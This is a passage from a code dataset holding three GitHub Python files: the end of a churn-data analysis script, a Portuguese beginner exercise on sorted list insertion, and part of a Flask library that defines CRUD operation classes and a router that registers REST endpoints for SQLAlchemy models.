as_cmap=True)\r\nsns.heatmap(corr, mask=mask, cmap=cmap, vmax=.3, center=0,\r\n square=True, linewidths=.5, cbar_kws={\"shrink\": .5})\r\nplt.suptitle(\"Correlation Matrix\",fontsize=20)\r\nplt.show()\r\n\r\ndataset = dataset.drop(columns = ['app_web_user'])\r\n# dataset = dataset.drop(columns = ['housing','payment_type','zodiac_sign'])\r\n# Note: Although there are somewhat correlated fields, they are not colinear\r\n# These feature are not functions of each other, so they won't break the model\r\n# But these feature won't help much either. Feature Selection should remove them.\r\n\r\ndataset.to_csv('new_churn_data.csv', index = False)\r\n\r\n","repo_name":"HimalayPatel/minimizing-churn-rate","sub_path":"minimizing_churn_eda.py","file_name":"minimizing_churn_eda.py","file_ext":"py","file_size_in_byte":3823,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"12842795174","text":"\"\"\"\nDesafio 080\n\nProblema: Crie um programa onde o usuário insira 5 valores númericos e os cadastre\n em uma lista, já na posição correta de inserção (sem usar o sort()).\n No final, mostre a lista.\n\"\"\"\n\nvalues = []\n\nfor x in range(0, 5):\n num = int(input('Insira um número:'))\n\n while num in values:\n print('-=-' * 15)\n print('Valor duplicado. Tente novamente...')\n num = int(input('Insira um número:'))\n print()\n\n if x == 0 or num > values[-1]:\n values.append(num)\n print('Valor adicionado no final da lista')\n else:\n pos = 0\n while pos < len(values):\n if num <= values[pos]:\n values.insert(pos, num)\n print(f'Valor adicionado na {pos}° posição')\n break\n\n pos += 1\n print()\n\nprint('-=-' * 15)\nprint(f'Voce inseriu os valores: {values}')\nprint('-=-' * 15)","repo_name":"Mich4elDoug/Python3_Curso","sub_path":"Mundo_3 - Estrutras_Compostas/Aula17 - (Listas)/ex080.py","file_name":"ex080.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16011034011","text":"from flask import Response\nimport json\nfrom schemalite.core import json_encoder\n\nfrom .crud_constructors import (\n construct_get_view_function,\n construct_index_view_function, construct_post_view_function,\n construct_put_view_function, construct_delete_view_function,\n construct_patch_view_function, construct_batch_save_view_function)\nfrom . import entity_definition_keys as edk\nfrom toolspy import (\n all_subclasses, fetch_nested_key_from_dict, fetch_nested_key,\n delete_dict_keys, union, merge, difference, transform_dict)\nfrom copy import deepcopy\n\n\nclass EntityOperation(object):\n \"\"\"\n Base class which represents a crud operation on the entity\n \"\"\"\n def __init__(self, entity=None):\n self.init_entity(entity)\n\n def init_entity(self, entity=None):\n self.entity = entity\n\n def to_dict(self):\n raise NotImplementedError\n\n\n\nclass Get(EntityOperation):\n \"\"\"This class represents a GET operation on an entity.\n Registers a GET endpoint at //\n\n Parameters\n ------------\n entity: Entity\n The entity object on which the Get operation is defined. Should be specified if the get\n operation is defined separately after the entity is defined. Can be skipped if it is instead\n defined as a part of the entity definition\n\n query_modifier: function, Optional\n A function which can modify the query used to fetch the object to be returned. By default\n the router obtains the instance to be fetched by Get by filtering the id attribute\n to be equal to the value of the id in the url.\n If we want to set some more filters before filtering\n should be a function which accepts a query and returns a query\n For example, if an api is supposed to return only confirmed orders, we can set the\n query_modifier like this\n \n query_modifier = lambda q: q.filter(Order.confirmed==True)\n\n This will take precedence over the query_modifier defined at entity level\n\n permitted_object_getter: function, optional\n A function which if set, will be used to retrieve the object to get. If This\n callable is set, then this will be used instead of the query used to get\n the object by default.\n For example if you want to get the current user always when registering user\n model in an api, you can set like this\n\n >>> Get(permitted_object_getter=lambda: current_user)\n\n This will take precedence over the permitted_object_getter defined at entity level\n\n id_attr: str, optional\n By default the primary key is used as the id attribute. But we can modify it to some\n other field. For example if we want the url to be like /users/abcd@xyz.com, then we cant\n set\n\n >>> Get(id_attr='email')\n\n response_dict_struct: dict, optional\n The dictionary used to specify the structure of the object\n\n Example:\n\n Get(\n response_dict_struct=dict(\n attrs=[\"id\", \"name\", \"description\"],\n rels={\n \"tasks\": dict(\n attrs=[\"id\", \"title\"],\n rels={\n \"assignees\": dict(attrs=[\"name\", \"email\"])\n }\n ),\n \"projects\": {}\n }\n )\n\n response_dict_modifiers: List[Callable[[dict, model instance], dict]], Optional\n A list of functions, where each function should be able to accept the response\n dictionary as the first argument and the instance which is being fetched \n as the second argument, and then make any modifications as required to the\n response dict and return it\n\n \n url: str\n Optional. Provide this if you want to override the default url for the Get\n operation which is of the format //. For example if you\n want to define a special endpoint /accounts/current which will let the client\n access the currently logged in account without knowing the id, then you would need\n to set this url parameter\n\n \n \"\"\"\n\n\n method = 'get'\n\n def __init__(\n self, entity=None, view_function=None, query_modifier=None,\n permitted_object_getter=None, id_attr=None, response_dict_struct=None,\n response_dict_modifiers=None, exception_handler=None, access_checker=None,\n url=None, enable_caching=False, cache_key_determiner=None,\n cache_timeout=None, ):\n super(Get, self).__init__(entity=entity)\n self.url = url\n self.enable_caching = enable_caching\n self.cache_key_determiner = cache_key_determiner\n self.cache_timeout = cache_timeout\n self.view_function = view_function\n self.query_modifier = query_modifier\n self.permitted_object_getter = permitted_object_getter\n self.id_attr = id_attr\n self.response_dict_struct = response_dict_struct\n self.response_dict_modifiers = response_dict_modifiers\n self.exception_handler = exception_handler\n self.access_checker = access_checker\n\n def to_dict(self):\n return transform_dict({\n edk.URL: self.url,\n edk.ENABLE_CACHING: self.enable_caching,\n edk.CACHE_KEY_DETERMINER: self.cache_key_determiner,\n edk.CACHE_TIMEOUT: self.cache_timeout,\n edk.VIEW_FUNC: self.view_function,\n edk.QUERY_MODIFIER: self.query_modifier,\n edk.PERMITTED_OPERATIONS: self.permitted_object_getter,\n edk.RESPONSE_DICT_STRUCT: self.response_dict_struct,\n edk.RESPONSE_DICT_MODIFIERS: self.response_dict_modifiers,\n edk.EXCEPTION_HANDLER: self.exception_handler,\n edk.ACCESS_CHECKER: self.access_checker,\n }, skip_none_vals=True)\n\n\nclass Index(EntityOperation):\n\n method = 'index'\n\n def __init__(\n self, entity=None, url=None, view_function=None, enable_caching=None,\n cache_key_determiner=None, cache_timeout=None, query_modifier=None,\n response_dict_struct=None, custom_response_creator=None,\n exception_handler=None, access_checker=None,\n default_limit=None, default_sort=None, default_orderby=None,\n default_offset=None, default_page=None, default_per_page=None):\n super(Index, self).__init__(entity=entity)\n self.url = url\n self.view_function = view_function\n self.enable_caching = enable_caching\n self.cache_key_determiner = cache_key_determiner\n self.cache_timeout = cache_timeout\n self.query_modifier = query_modifier\n self.response_dict_struct = response_dict_struct\n self.custom_response_creator = custom_response_creator\n self.exception_handler = exception_handler\n self.access_checker = access_checker\n self.default_limit = default_limit\n self.default_sort = default_sort\n self.default_orderby = default_orderby\n self.default_offset = default_offset\n self.default_page = default_page\n self.default_per_page = default_per_page\n\n def to_dict(self):\n return transform_dict({\n edk.URL: self.url,\n edk.VIEW_FUNC: self.view_function,\n edk.ENABLE_CACHING: self.enable_caching,\n edk.CACHE_KEY_DETERMINER: self.cache_key_determiner,\n edk.CACHE_TIMEOUT: self.cache_timeout,\n edk.QUERY_MODIFIER: self.query_modifier,\n edk.RESPONSE_DICT_STRUCT: self.response_dict_struct,\n edk.CUSTOM_RESPONSE_CREATOR: self.custom_response_creator,\n edk.EXCEPTION_HANDLER: self.exception_handler,\n edk.ACCESS_CHECKER: self.access_checker,\n edk.DEFAULT_LIMIT: self.default_limit,\n edk.DEFAULT_SORT: self.default_sort,\n edk.DEFAULT_ORDERBY: self.default_orderby,\n edk.DEFAULT_OFFSET: self.default_offset,\n edk.DEFAULT_PAGE: self.default_page,\n edk.DEFAULT_PER_PAGE: self.default_per_page\n }, skip_none_vals=True)\n\n\nclass Post(EntityOperation):\n\n method = 'post'\n\n def __init__(\n self, entity=None, url=None, view_function=None, before_save=None, after_save=None,\n response_dict_struct=None, exception_handler=None, access_checker=None,\n settable_fields=None, non_settable_fields=None,\n remove_property_keys_before_validation=False, remove_relationship_keys_before_validation=False,\n remove_assoc_proxy_keys_before_validation=False, input_schema_modifier=None):\n super(Post, self).__init__(entity=entity)\n self.url = url\n self.view_function = view_function\n self.before_save = before_save\n self.after_save = after_save\n self.response_dict_struct = response_dict_struct\n self.exception_handler = exception_handler\n self.access_checker = access_checker\n self.settable_fields = settable_fields\n self.non_settable_fields = non_settable_fields\n self.remove_property_keys_before_validation = remove_property_keys_before_validation\n self.remove_relationship_keys_before_validation = remove_relationship_keys_before_validation\n self.remove_assoc_proxy_keys_before_validation = remove_assoc_proxy_keys_before_validation\n self.input_schema_modifier = input_schema_modifier\n\n\n def to_dict(self):\n return transform_dict({\n edk.URL: self.url,\n edk.VIEW_FUNC: self.view_function,\n edk.BEFORE_SAVE_HANDLERS: self.before_save,\n edk.AFTER_SAVE_HANDLERS: self.after_save,\n edk.RESPONSE_DICT_STRUCT: self.response_dict_struct,\n edk.EXCEPTION_HANDLER: self.exception_handler,\n edk.ACCESS_CHECKER: self.access_checker,\n edk.SETTABLE_FIELDS: self.settable_fields,\n edk.NON_SETTABLE_FIELDS: self.non_settable_fields,\n edk.REMOVE_PROPERTY_KEYS_BEFORE_VALIDATION: self.remove_property_keys_before_validation,\n edk.REMOVE_RELATIONSHIP_KEYS_BEFORE_VALIDATION: self.remove_relationship_keys_before_validation,\n edk.REMOVE_ASSOC_PROXY_KEYS_BEFORE_VALIDATION: self.remove_assoc_proxy_keys_before_validation,\n edk.INPUT_SCHEMA_MODIFIER: self.input_schema_modifier\n }, skip_none_vals=True)\n\nclass Put(EntityOperation):\n\n method = 'put'\n\n def __init__(\n self, entity=None, url=None, view_function=None,\n query_modifier=None,\n permitted_object_getter=None,\n before_save=None, after_save=None,\n response_dict_struct=None, exception_handler=None, access_checker=None,\n settable_fields=None, non_settable_fields=None,\n remove_property_keys_before_validation=False, remove_relationship_keys_before_validation=False,\n remove_assoc_proxy_keys_before_validation=False, input_schema_modifier=None):\n super(Put, self).__init__(entity=entity)\n self.url = url\n self.view_function = view_function\n self.query_modifier = query_modifier\n self.permitted_object_getter = permitted_object_getter\n self.before_save = before_save\n self.after_save = after_save\n self.response_dict_struct = response_dict_struct\n self.exception_handler = exception_handler\n self.access_checker = access_checker\n self.settable_fields = settable_fields\n self.non_settable_fields = non_settable_fields\n self.remove_property_keys_before_validation = remove_property_keys_before_validation\n self.remove_relationship_keys_before_validation = remove_relationship_keys_before_validation\n self.remove_assoc_proxy_keys_before_validation = remove_assoc_proxy_keys_before_validation\n self.input_schema_modifier = input_schema_modifier\n\n\n def to_dict(self):\n return transform_dict({\n edk.URL: self.url,\n edk.VIEW_FUNC: self.view_function,\n edk.QUERY_MODIFIER: self.query_modifier,\n edk.PERMITTED_OBJECT_GETTER: self.permitted_object_getter,\n edk.BEFORE_SAVE_HANDLERS: self.before_save,\n edk.AFTER_SAVE_HANDLERS: self.after_save,\n edk.RESPONSE_DICT_STRUCT: self.response_dict_struct,\n edk.EXCEPTION_HANDLER: self.exception_handler,\n edk.ACCESS_CHECKER: self.access_checker,\n edk.SETTABLE_FIELDS: self.settable_fields,\n edk.NON_SETTABLE_FIELDS: self.non_settable_fields,\n edk.REMOVE_PROPERTY_KEYS_BEFORE_VALIDATION: self.remove_property_keys_before_validation,\n edk.REMOVE_RELATIONSHIP_KEYS_BEFORE_VALIDATION: self.remove_relationship_keys_before_validation,\n edk.REMOVE_ASSOC_PROXY_KEYS_BEFORE_VALIDATION: self.remove_assoc_proxy_keys_before_validation,\n edk.INPUT_SCHEMA_MODIFIER: self.input_schema_modifier\n }, skip_none_vals=True)\n\n\nclass Patch(EntityOperation):\n\n method = 'patch'\n\n def __init__(\n self, entity=None, url=None, view_function=None, query_modifier=None,\n commands=None, permitted_object_getter=None,\n before_save=None, after_save=None,\n response_dict_struct=None, exception_handler=None, access_checker=None,\n settable_fields=None, non_settable_fields=None,\n remove_property_keys_before_validation=False, remove_relationship_keys_before_validation=False,\n remove_assoc_proxy_keys_before_validation=False, input_schema_modifier=None):\n super(Patch, self).__init__(entity=entity)\n self.url = url\n self.view_function = view_function\n self.query_modifier = query_modifier\n self.permitted_object_getter = permitted_object_getter\n self.commands = commands\n self.before_save = before_save\n self.after_save = after_save\n self.response_dict_struct = response_dict_struct\n self.exception_handler = exception_handler\n self.access_checker = access_checker\n self.settable_fields = settable_fields\n self.non_settable_fields = non_settable_fields\n self.remove_property_keys_before_validation = remove_property_keys_before_validation\n self.remove_relationship_keys_before_validation = remove_relationship_keys_before_validation\n self.remove_assoc_proxy_keys_before_validation = remove_assoc_proxy_keys_before_validation\n self.input_schema_modifier = input_schema_modifier\n\n\n def to_dict(self):\n return transform_dict({\n edk.URL: self.url,\n edk.VIEW_FUNC: self.view_function,\n edk.QUERY_MODIFIER: self.query_modifier,\n edk.BEFORE_SAVE_HANDLERS: self.before_save,\n edk.AFTER_SAVE_HANDLERS: self.after_save,\n edk.RESPONSE_DICT_STRUCT: self.response_dict_struct,\n edk.EXCEPTION_HANDLER: self.exception_handler,\n edk.ACCESS_CHECKER: self.access_checker,\n edk.SETTABLE_FIELDS: self.settable_fields,\n edk.NON_SETTABLE_FIELDS: self.non_settable_fields,\n edk.REMOVE_PROPERTY_KEYS_BEFORE_VALIDATION: self.remove_property_keys_before_validation,\n edk.REMOVE_RELATIONSHIP_KEYS_BEFORE_VALIDATION: self.remove_relationship_keys_before_validation,\n edk.REMOVE_ASSOC_PROXY_KEYS_BEFORE_VALIDATION: self.remove_assoc_proxy_keys_before_validation,\n edk.INPUT_SCHEMA_MODIFIER: self.input_schema_modifier\n }, skip_none_vals=True)\n\nclass Delete(EntityOperation):\n\n method = 'delete'\n\n def __init__(\n self, entity=None, url=None, view_function=None, query_modifier=None,\n permitted_object_getter=None,\n before_save=None, after_save=None,\n response_dict_struct=None, exception_handler=None, access_checker=None,\n settable_fields=None, non_settable_fields=None,\n remove_property_keys_before_validation=False, remove_relationship_keys_before_validation=False,\n remove_assoc_proxy_keys_before_validation=False, input_schema_modifier=None):\n super(Delete, self).__init__(entity=entity)\n self.url = url\n self.view_function = view_function\n self.query_modifier = query_modifier\n self.permitted_object_getter = permitted_object_getter\n self.before_save = before_save\n self.after_save = after_save\n self.response_dict_struct = response_dict_struct\n self.exception_handler = exception_handler\n self.access_checker = access_checker\n self.settable_fields = settable_fields\n self.non_settable_fields = non_settable_fields\n self.remove_property_keys_before_validation = remove_property_keys_before_validation\n self.remove_relationship_keys_before_validation = remove_relationship_keys_before_validation\n self.remove_assoc_proxy_keys_before_validation = remove_assoc_proxy_keys_before_validation\n self.input_schema_modifier = input_schema_modifier\n\n\n def to_dict(self):\n return transform_dict({\n edk.URL: self.url,\n edk.VIEW_FUNC: self.view_function,\n edk.QUERY_MODIFIER: self.query_modifier,\n edk.PERMITTED_OBJECT_GETTER: self.permitted_object_getter,\n edk.BEFORE_SAVE_HANDLERS: self.before_save,\n edk.AFTER_SAVE_HANDLERS: self.after_save,\n edk.RESPONSE_DICT_STRUCT: self.response_dict_struct,\n edk.EXCEPTION_HANDLER: self.exception_handler,\n edk.ACCESS_CHECKER: self.access_checker,\n edk.SETTABLE_FIELDS: self.settable_fields,\n edk.NON_SETTABLE_FIELDS: self.non_settable_fields,\n edk.REMOVE_PROPERTY_KEYS_BEFORE_VALIDATION: self.remove_property_keys_before_validation,\n edk.REMOVE_RELATIONSHIP_KEYS_BEFORE_VALIDATION: self.remove_relationship_keys_before_validation,\n edk.REMOVE_ASSOC_PROXY_KEYS_BEFORE_VALIDATION: self.remove_assoc_proxy_keys_before_validation,\n edk.INPUT_SCHEMA_MODIFIER: self.input_schema_modifier\n }, skip_none_vals=True)\n\nclass BatchSave(EntityOperation):\n\n method = 'batch_save'\n\n def __init__(\n self, entity=None, url=None, view_function=None, query_modifier=None,\n permitted_object_getter=None, unique_identifier_fields=None, \n before_save=None, after_save=None,\n extra_actions_before_save=None, extra_actions_after_save=None,\n result_saving_instance_model=None,\n result_saving_instance_getter=None,\n run_as_async_task=False, celery_worker=None,\n response_dict_struct=None, exception_handler=None, access_checker=None,\n settable_fields=None, non_settable_fields=None,\n remove_property_keys_before_validation=False, remove_relationship_keys_before_validation=False,\n remove_assoc_proxy_keys_before_validation=False, input_schema_modifier=None,\n update_only=False, create_only=False,\n skip_pre_processors=False, skip_post_processors=False):\n super(BatchSave, self).__init__(entity=entity)\n self.url = url\n self.view_function = view_function\n self.query_modifier = query_modifier\n self.permitted_object_getter = permitted_object_getter\n self.unique_identifier_fields = unique_identifier_fields\n self.result_saving_instance_model = result_saving_instance_model\n self.result_saving_instance_getter = result_saving_instance_getter\n self.run_as_async_task = run_as_async_task\n self.celery_worker = celery_worker\n self.update_only = update_only\n self.create_only = create_only\n self.skip_pre_processors = skip_pre_processors\n self.skip_post_processors = skip_post_processors\n self.before_save = before_save\n self.after_save = after_save\n self.extra_actions_before_save = extra_actions_before_save\n self.extra_actions_after_save = extra_actions_after_save\n self.response_dict_struct = response_dict_struct\n self.exception_handler = exception_handler\n self.access_checker = access_checker\n self.settable_fields = settable_fields\n self.non_settable_fields = non_settable_fields\n self.remove_property_keys_before_validation = remove_property_keys_before_validation\n self.remove_relationship_keys_before_validation = remove_relationship_keys_before_validation\n self.remove_assoc_proxy_keys_before_validation = remove_assoc_proxy_keys_before_validation\n self.input_schema_modifier = input_schema_modifier\n\n\nclass Entity(object):\n\n \"\"\"This class represents a resource on which all the CRUD operations are defined.\n Think of it as a wrapper around the model. The same model can be exposed as different\n entities in different parts of the application\n\n Parameters\n ------------\n url_slug: str, Optional\n The common url slug which will be used to define the various CRUD endpoints\n defined on the entity. For example for an entity named Order, you can define\n the url_slug as orders\n\n model_class: class:flask_sqlalchemy.model.DefaultMeta\n The model for which the entity is being defined. This should be a Model class\n defined with FlaskSQLAlchemyBooster's model meta class as the base.\n\n name: str, optional\n An optional name for the entity. If it is not specified, the model name will be used\n as the name\n \n router: class:EntityRouter\n The router to which the entity is to be linked. To be specified if the entity is\n defined separately\n\n \n \"\"\"\n\n def __init__(\n self, url_slug=None, model_class=None, name=None, router=None,\n permitted_operations=None, permitted_object_getter=None,\n forbidden_operations=None, endpoint_slug=None, input_schema_modifier=None,\n query_modifier=None, access_checker=None, exception_handler=None, response_dict_modifiers=None,\n id_attr=None, response_dict_struct=None, non_settable_fields=None, settable_fields=None,\n remove_relationship_keys_before_validation=False, remove_assoc_proxy_keys_before_validation=False,\n remove_property_keys_before_validation=False, enable_caching=False, cache_timeout=None,\n get=None, index=None, put=None, post=None, patch=None, delete=None, batch_save=None):\n self.model_class = model_class\n self.name = name or self.model_class.__name__\n self.router = router\n if self.router:\n if self not in self.router.routes:\n self.router.routes[self.url_slug] = self\n self.url_slug = url_slug\n self.permitted_object_getter = permitted_object_getter\n self.permitted_operations = permitted_operations\n self.forbidden_operations = forbidden_operations\n self.endpoint_slug = endpoint_slug\n self.input_schema_modifier = input_schema_modifier\n self.query_modifier = query_modifier\n self.access_checker = access_checker\n self.exception_handler = exception_handler\n self.response_dict_modifiers = response_dict_modifiers\n self.response_dict_struct = response_dict_struct\n self.id_attr = id_attr\n self.non_settable_fields = non_settable_fields if non_settable_fields else []\n self.settable_fields = settable_fields if settable_fields else []\n self.enable_caching = enable_caching\n self.cache_timeout = cache_timeout\n self.remove_relationship_keys_before_validation = remove_relationship_keys_before_validation\n self.remove_assoc_proxy_keys_before_validation = remove_assoc_proxy_keys_before_validation\n self.remove_property_keys_before_validation = remove_property_keys_before_validation\n\n self.get = get\n if self.get and self.get.entity is None:\n self.get.init_entity(self)\n\n self.index = index\n if self.index and self.index.entity is None:\n self.index.init_entity(self)\n\n self.post = post\n if self.post and self.post.entity is None:\n self.post.init_entity(self)\n\n self.put = put\n if self.put and self.put.entity is None:\n self.put.init_entity(self)\n\n self.delete = delete\n if self.delete and self.delete.entity is None:\n self.delete.init_entity(self)\n\n self.patch = patch\n if self.patch and self.patch.entity is None:\n self.patch.init_entity(self)\n\n self.batch_save = batch_save\n if self.batch_save and self.batch_save.entity is None:\n self.batch_save.init_entity(self)\n \n\n def to_dict(self):\n return transform_dict({\n edk.URL_SLUG: self.url_slug,\n edk.PERMITTED_OPERATIONS: self.permitted_operations,\n edk.FORBIDDEN_OPERATIONS: self.forbidden_operations,\n edk.ENDPOINT_SLUG: self.endpoint_slug,\n edk.QUERY_MODIFIER: self.query_modifier,\n edk.ACCESS_CHECKER: self.access_checker,\n edk.EXCEPTION_HANDLER: self.exception_handler,\n edk.RESPONSE_DICT_MODIFIERS: self.response_dict_modifiers,\n edk.RESPONSE_DICT_STRUCT: self.response_dict_struct,\n edk.ID_ATTR: self.id_attr,\n edk.NON_SETTABLE_FIELDS: self.non_settable_fields,\n edk.SETTABLE_FIELDS: self.settable_fields,\n edk.ENABLE_CACHING: self.enable_caching,\n edk.CACHE_TIMEOUT: self.cache_timeout,\n edk.REMOVE_RELATIONSHIP_KEYS_BEFORE_VALIDATION: self.remove_relationship_keys_before_validation,\n edk.REMOVE_ASSOC_PROXY_KEYS_BEFORE_VALIDATION: self.remove_assoc_proxy_keys_before_validation,\n edk.REMOVE_PROPERTY_KEYS_BEFORE_VALIDATION: self.remove_property_keys_before_validation\n }, skip_none_vals=True)\n\n\n\nclass EntitiesRouter(object):\n\n \"\"\"\n Contains a collection of entities mapped to url routes. The router\n can be mounted on an app or a blueprint.\n\n Parameters\n -----------\n\n mount_point: Flask app or blueprint\n The app or blueprint on which the router is to be mounted. If this\n parameter is specified, the router will be mounted immediately. Or\n you can leave this unspecified and later call `router.mount_on(app_or_bp)`\n\n routes: dict\n A dictionary of url slugs mapped to entities like this\n {\n \"orders\": Entity(model_class=Order, index=Index(), get=Get(), post=Post(), put=Put()),\n \"users\": Entity(model_class=User, index=Index())\n }\n\n cache_handler: `class:FlaskCaching`\n A cache instance. Currently supports only FlaskCaching\n\n exception_handler: function, optional\n A function which accepts an exception and returns a json response\n\n Example:\n\n >>> def log_exception_and_return_json(e):\n >>> return error_json(400, e.message)\n\n celery_worker: Celery, optional\n A celery worker which will be used to run the async batch save operation.\n\n register_schema_definition: bool, optional\n A bool flag which specifies whether the schema definition json needs to be registered.\n\n schema_def_url: str, Optional\n The url slug to be used to register the schema definition\n\n register_views_map: bool, optional\n A bool flag which specifies whether the views map json needs to be registered.\n\n views_map_url: str, Optional\n The url slug to be used to register the views map\n\n \"\"\"\n\n def __init__(self,\n mount_point=None, routes=None, allow_unknown_fields=False, \n cache_handler=None, exception_handler=None,\n tmp_folder_path=\"/tmp\", permitted_operations=None,\n forbidden_operations=None, celery_worker=None,\n register_schema_definition=True, register_views_map=True,\n schema_def_url='/schema-def', views_map_url='/views-map',\n base_url=None\n ):\n\n self.schema_definition = {\n \"models_registered_for_views\": [],\n \"model_schemas\": {\n\n },\n \"views\": {\n\n }\n }\n self.routes = routes or {}\n for url_slug, entity in self.routes.items():\n if entity.url_slug is None:\n entity.url_slug = url_slug\n if entity.router is None:\n entity.router = self\n self.allow_unknown_fields = allow_unknown_fields\n self.cache_handler = cache_handler\n self.exception_handler = exception_handler\n self.tmp_folder_path = tmp_folder_path\n self.permitted_operations = permitted_operations\n self.forbidden_operations = forbidden_operations\n self.celery_worker = celery_worker\n self.register_schema_definition = register_schema_definition\n self.register_views_map = register_views_map\n self.schema_def_url = schema_def_url\n self.views_map_url = views_map_url\n # self.registry = {}\n self.initialize_registry_entry()\n if mount_point:\n self.mount_point = mount_point\n self.mount_on(self.mount_point)\n\n def route(self, url_slug, entity):\n self.routes[url_slug] = entity\n if entity.url_slug is None:\n entity.url_slug = url_slug\n if entity.router is None:\n entity.router = self\n\n\n def get_registry_entry(self):\n return self.registry\n\n def initialize_registry_entry(self):\n self.registry = {\n \"models_registered_for_views\": [],\n \"model_schemas\": {\n\n },\n edk.OPERATION_MODIFIERS: {\n\n }\n }\n def mount_on(\n self, app_or_bp, allow_unknown_fields=False, cache_handler=None,\n exception_handler=None,\n tmp_folder_path=None, celery_worker=None,\n register_schema_definition=None, register_views_map=None,\n schema_def_url=None, views_map_url=None):\n self.mount_point = app_or_bp\n if allow_unknown_fields is None:\n allow_unknown_fields = self.allow_unknown_fields\n if register_schema_definition is None:\n register_schema_definition = self.register_schema_definition\n if register_views_map is None:\n register_views_map = self.register_views_map\n self.register_crud_routes(\n allow_unknown_fields=allow_unknown_fields,\n cache_handler=cache_handler or self.cache_handler, \n exception_handler=exception_handler or self.exception_handler,\n tmp_folder_path=tmp_folder_path or self.tmp_folder_path,\n celery_worker=celery_worker or self.celery_worker,\n register_schema_definition=register_schema_definition,\n register_views_map=register_views_map,\n schema_def_url=schema_def_url or self.schema_def_url,\n views_map_url=views_map_url or self.views_map_url\n )\n\n\n def to_dict(self):\n entities_map = {}\n for url_slug, entity in self.routes.items():\n entities_map[entity.name or entity.model_class] = entity.to_dict()\n return entities_map\n\n\n def register_crud_routes(\n self, allow_unknown_fields=False, cache_handler=None,\n exception_handler=None,\n tmp_folder_path=\"/tmp\", celery_worker=None,\n register_schema_definition=True, register_views_map=True,\n schema_def_url='/schema-def', views_map_url='/views-map'):\n\n app_or_bp = self.mount_point\n registry = self.get_registry_entry()\n model_schemas = registry[\"model_schemas\"]\n\n def populate_model_schema(model_class, entity=None):\n model_key = fetch_nested_key(entity, 'name') or model_class.__name__\n if model_class._input_data_schema_:\n input_schema = deepcopy(model_class._input_data_schema_)\n else:\n input_schema = model_class.generate_input_data_schema()\n if entity and callable(entity.input_schema_modifier):\n input_schema = entity.input_schema_modifier(\n input_schema)\n model_schemas[model_key] = {\n \"input_schema\": input_schema,\n \"output_schema\": model_class.output_data_schema(),\n \"accepted_data_structure\": model_class.max_permissible_dict_structure()\n }\n for subcls in all_subclasses(model_class):\n if subcls.__name__ not in model_schemas:\n model_schemas[subcls.__name__] = {\n 'is_a_polymorphically_derived_from': model_class.__name__,\n 'polymorphic_identity': subcls.__mapper_args__['polymorphic_identity']\n }\n for rel in model_class.__mapper__.relationships.values():\n if rel.mapper.class_.__name__ not in model_schemas:\n populate_model_schema(rel.mapper.class_)\n\n for url_slug, entity in self.routes.items():\n _model = entity.model_class\n _model_name = entity.name\n base_url = url_slug\n # base_url = _model_dict.get(edk.URL_SLUG)\n\n default_query_constructor = entity.query_modifier\n default_access_checker = entity.access_checker\n default_exception_handler = entity.exception_handler or exception_handler\n default_dict_post_processors = entity.response_dict_modifiers\n default_id_attr = entity.id_attr\n dict_struct_for_model = entity.response_dict_struct\n fields_forbidden_from_being_set_for_all_views = entity.non_settable_fields or []\n fields_allowed_to_be_set_for_all_views = entity.settable_fields or []\n remove_relationship_keys_before_validation = entity.remove_relationship_keys_before_validation\n remove_assoc_proxy_keys_before_validation = entity.remove_assoc_proxy_keys_before_validation\n remove_property_keys_before_validation = entity.remove_property_keys_before_validation\n enable_caching = entity.enable_caching and cache_handler is not None\n cache_timeout = entity.cache_timeout\n endpoint_slug = entity.endpoint_slug or _model.__tablename__\n\n if _model_name not in registry[\"models_registered_for_views\"]:\n registry[\"models_registered_for_views\"].append(\n _model_name)\n if _model_name not in model_schemas:\n populate_model_schema(entity.model_class, entity)\n\n if _model._input_data_schema_:\n model_default_input_schema = deepcopy(_model._input_data_schema_)\n else:\n model_default_input_schema = _model.generate_input_data_schema()\n if callable(entity.input_schema_modifier):\n model_default_input_schema = entity.input_schema_modifier(\n model_default_input_schema)\n\n views = registry[edk.OPERATION_MODIFIERS]\n schemas_registry = {k: v.get('input_schema')\n for k, v in list(model_schemas.items())}\n if _model_name not in views:\n views[_model_name] = {}\n\n if entity.index:\n index_op = entity.index\n if index_op.enable_caching is not None:\n enable_caching = index_op.enable_caching and cache_handler is not None\n cache_key_determiner = index_op.cache_key_determiner\n cache_timeout = index_op.cache_timeout or cache_timeout\n index_func = index_op.view_function or construct_index_view_function(\n _model,\n index_query_creator=index_op.query_modifier or default_query_constructor,\n dict_struct=index_op.response_dict_struct or dict_struct_for_model,\n custom_response_creator=index_op.custom_response_creator,\n enable_caching=enable_caching,\n cache_handler=cache_handler,\n cache_key_determiner=cache_key_determiner,\n cache_timeout=cache_timeout,\n exception_handler=index_op.exception_handler or default_exception_handler,\n access_checker=index_op.access_checker or default_access_checker,\n default_limit=index_op.default_limit,\n default_sort=index_op.default_sort,\n default_orderby=index_op.default_orderby,\n default_offset=index_op.default_offset,\n default_page=index_op.default_page,\n default_per_page=index_op.default_per_page\n )\n index_url = index_op.url or \"/%s\" % base_url\n app_or_bp.route(\n index_url, methods=['GET'], endpoint='index_%s' % endpoint_slug)(\n index_func)\n views[_model_name][edk.INDEX] = {edk.URL: index_url}\n\n if entity.get:\n get_op = entity.get\n if get_op.enable_caching is not None:\n enable_caching = get_op.enable_caching and cache_handler is not None\n cache_key_determiner = get_op.cache_key_determiner\n cache_timeout = get_op.cache_timeout or cache_timeout\n get_func = get_op.view_function or construct_get_view_function(\n _model,\n permitted_object_getter=get_op.permitted_object_getter or entity.permitted_object_getter,\n get_query_creator=get_op.query_modifier or default_query_constructor,\n dict_struct=get_op.response_dict_struct or dict_struct_for_model,\n enable_caching=enable_caching,\n cache_handler=cache_handler, cache_key_determiner=cache_key_determiner,\n cache_timeout=cache_timeout,\n exception_handler=get_op.exception_handler or default_exception_handler,\n access_checker=get_op.access_checker or default_access_checker,\n id_attr_name=get_op.id_attr or default_id_attr,\n dict_post_processors=get_op.response_dict_modifiers or default_dict_post_processors)\n get_url = get_op.url or '/%s/<_id>' % base_url\n app_or_bp.route(\n get_url, methods=['GET'], endpoint='get_%s' % endpoint_slug)(\n get_func)\n views[_model_name]['get'] = {edk.URL: get_url}\n\n if entity.post:\n post_op = entity.post\n if callable(post_op.input_schema_modifier):\n post_input_schema = post_op.input_schema_modifier(\n deepcopy(model_default_input_schema))\n else:\n post_input_schema = model_default_input_schema\n post_func = post_op.view_function or 